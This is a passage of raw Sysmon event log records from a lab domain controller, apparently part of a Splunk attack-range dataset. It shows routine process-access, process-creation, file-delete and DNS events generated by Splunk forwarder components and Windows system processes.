Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34B59A014894B8CE03E7F5E8456AAD80,SHA256=A319C04A6686DB488A1A8B34CA8BC21B1421B88EDB5BB26443059936B465D822,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D32-603E-58AA-00000000AD01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D32-603E-58AA-00000000AD01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.981{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D32-603E-58AA-00000000AD01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.982{05ADC7E1-6D32-603E-58AA-00000000AD01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:02.402{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DA1A219B809E691E69918FF32C260C,SHA256=1DE1EAC19B67B562DC7BE4CAC3A8199E97C0F1A1E2788ED5D051AF0935C2EB00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.778{05ADC7E1-6D33-603E-59AA-00000000AD01}971616328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D33-603E-59AA-00000000AD01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D33-603E-59AA-00000000AD01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.590{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D33-603E-59AA-00000000AD01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.592{05ADC7E1-6D33-603E-59AA-00000000AD01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.423{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696AB48407515FC4FE75E3DAF63292A7,SHA256=1E19B3B71750AE034CEE796F99B17F7EA65C9118B00530228720457F8299B7EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.168{05ADC7E1-6D32-603E-58AA-00000000AD01}430012788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002235088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.400{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54285- 10341000x80000000000000002235087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D34-603E-5BAA-00000000AD01}11548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D34-603E-5BAA-00000000AD01}11548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.871{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D34-603E-5BAA-00000000AD01}11548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.872{05ADC7E1-6D34-603E-5BAA-00000000AD01}11548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.465{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83391ADC9D8CEE0710FF908641554AB7,SHA256=34E8AE21C7705D9F5A332131FF23F4925134E8B10CA864AC07EBFF435D622116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 